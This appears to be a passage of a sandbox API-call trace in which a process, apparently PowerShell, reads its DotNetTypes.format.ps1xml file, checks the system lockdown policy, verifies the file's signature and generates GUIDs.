	[0044.611] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x9000
	[0044.611] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.612] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xa000
	[0044.612] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.612] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xb000
	[0044.612] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.612] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xc000
	[0044.613] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.613] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xd000
	[0044.613] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.613] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xe000
	[0044.613] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.613] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xf000
	[0044.613] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.614] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x10000
	[0044.614] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.614] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x11000
	[0044.614] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.614] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x12000
	[0044.614] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.615] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x13000
	[0044.615] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.615] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x14000
	[0044.615] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.615] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x15000
	[0044.615] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.615] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x16000
	[0044.616] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.616] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x17000
	[0044.616] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.616] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x18000
	[0044.616] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.616] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x19000
	[0044.616] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.617] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1a000
	[0044.617] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.617] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1b000
	[0044.617] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.617] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1c000
	[0044.617] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.617] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1d000
	[0044.617] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.618] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1e000
	[0044.618] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.630] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1f000
	[0044.630] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.631] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x20000
	[0044.631] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.631] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x21000
	[0044.631] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0xbef, lpOverlapped=0x0) returned 1
	[0044.631] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x21bef
	[0044.631] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737aed7, nNumberOfBytesToRead=0x11, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737aed7*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0044.631] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x21bef
	[0044.631] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504737b780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504737b780*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0044.634] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8970
	[0044.634] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.634] CoTaskMemFree (pv=0x1505f3b8970) 
	[0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ceb0) returned 1
	[0044.634] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf90 | out: lpFileInformation=0x184b47cf90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce70) returned 1
	[0044.635] WldpGetLockdownPolicy () returned 0x0
	[0044.635] GetSystemInfo (in: lpSystemInfo=0x184b47cff0 | out: lpSystemInfo=0x184b47cff0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.635] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cef8 | out: phkResult=0x184b47cef8*=0x5b8) returned 0x0
	[0044.635] RegQueryValueExW (in: hKey=0x5b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf48, lpData=0x0, lpcbData=0x184b47cf40*=0x0 | out: lpType=0x184b47cf48*=0x0, lpData=0x0, lpcbData=0x184b47cf40*=0x0) returned 0x2
	[0044.635] RegCloseKey (hKey=0x5b8) returned 0x0
	[0044.635] CloseHandle (hObject=0x3d8) returned 1
	[0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0044.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf10) returned 1
	[0044.635] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x150473c4728 | out: lpFileInformation=0x150473c4728*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21bef)) returned 1
	[0044.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0044.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0044.635] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21bef)) returned 1
	[0044.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0044.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0044.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd60) returned 1
	[0044.636] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47ce40 | out: lpFileInformation=0x184b47ce40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21bef)) returned 1
	[0044.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cd20) returned 1
	[0044.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0044.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ccf0) returned 1
	[0044.636] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0044.636] GetFileType (hFile=0x3d8) returned 0x1
	[0044.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc60) returned 1
	[0044.636] GetFileType (hFile=0x3d8) returned 0x1
	[0044.636] WTGetSignatureInfo () returned 0x0
	[0044.665] CertDuplicateCertificateContext (pCertContext=0x1505fba7ea0) returned 0x1505fba7ea0
	[0044.665] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cd88 | out: phkResult=0x184b47cd88*=0x5dc) returned 0x0
	[0044.665] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x0, lpcbData=0x184b47cdd0*=0x0 | out: lpType=0x184b47cdd8*=0x1, lpData=0x0, lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0044.665] RegQueryValueExW (in: hKey=0x5dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47cdd8, lpData=0x150473c5380, lpcbData=0x184b47cdd0*=0x56 | out: lpType=0x184b47cdd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47cdd0*=0x56) returned 0x0
	[0044.665] RegCloseKey (hKey=0x5dc) returned 0x0
	[0044.665] CoTaskMemAlloc (cb=0x10) returned 0x1505fb06cf0
	[0044.665] CoTaskMemAlloc (cb=0x50) returned 0x1505f464fe0
	[0044.665] WinVerifyTrust () returned 0x0
	[0044.666] CoTaskMemFree (pv=0x1505f464fe0) 
	[0044.666] CoTaskMemFree (pv=0x1505fb06cf0) 
	[0044.666] CertFreeCertificateContext (pCertContext=0x1505fba7ea0) returned 1
	[0044.666] CloseHandle (hObject=0x3d8) returned 1
	[0044.677] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6bb0
	[0044.677] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6bb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.677] CoTaskMemFree (pv=0x1505f3b6bb0) 
	[0044.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cfa0) returned 1
	[0044.677] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47d080 | out: lpFileInformation=0x184b47d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cf60) returned 1
	[0044.678] WldpGetLockdownPolicy () returned 0x0
	[0044.678] GetSystemInfo (in: lpSystemInfo=0x184b47d0e0 | out: lpSystemInfo=0x184b47d0e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.678] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cfe8 | out: phkResult=0x184b47cfe8*=0x3d8) returned 0x0
	[0044.678] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47d038, lpData=0x0, lpcbData=0x184b47d030*=0x0 | out: lpType=0x184b47d038*=0x0, lpData=0x0, lpcbData=0x184b47d030*=0x0) returned 0x2
	[0044.678] RegCloseKey (hKey=0x3d8) returned 0x0
	[0044.678] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x44753032, Data2=0x76, Data3=0x441d, Data4=([0]=0xa1, [1]=0xd4, [2]=0xd2, [3]=0xb9, [4]=0x2, [5]=0xca, [6]=0x2b, [7]=0xe1))) returned 0x0
	[0044.678] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc1233f31, Data2=0x737e, Data3=0x4155, Data4=([0]=0x9f, [1]=0x7a, [2]=0x66, [3]=0x43, [4]=0xd1, [5]=0xbb, [6]=0x54, [7]=0x8))) returned 0x0
	[0044.678] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xe4668232, Data2=0x7618, Data3=0x42af, Data4=([0]=0xa7, [1]=0x6d, [2]=0x9a, [3]=0xc2, [4]=0xca, [5]=0x0, [6]=0x1c, [7]=0x9a))) returned 0x0
	[0044.679] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x519ddce0, Data2=0x86a1, Data3=0x434e, Data4=([0]=0x9d, [1]=0x7d, [2]=0xf2, [3]=0xa2, [4]=0xd7, [5]=0x6d, [6]=0xd, [7]=0x62))) returned 0x0
	[0044.679] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x3421bd72, Data2=0x7c12, Data3=0x4435, Data4=([0]=0x9d, [1]=0x4f, [2]=0xa7, [3]=0x4b, [4]=0xcb, [5]=0x2c, [6]=0xd6, [7]=0x41))) returned 0x0
	[0044.679] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x32900c5c, Data2=0x21f2, Data3=0x4b92, Data4=([0]=0xb5, [1]=0xa4, [2]=0x30, [3]=0x3b, [4]=0x5, [5]=0x8e, [6]=0xf2, [7]=0x5f))) returned 0x0
	[0044.679] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xd79f6fbd, Data2=0x26a9, Data3=0x4d08, Data4=([0]=0xa5, [1]=0xe9, [2]=0x4b, [3]=0xed, [4]=0x14, [5]=0xed, [6]=0xfd, [7]=0x48))) returned 0x0
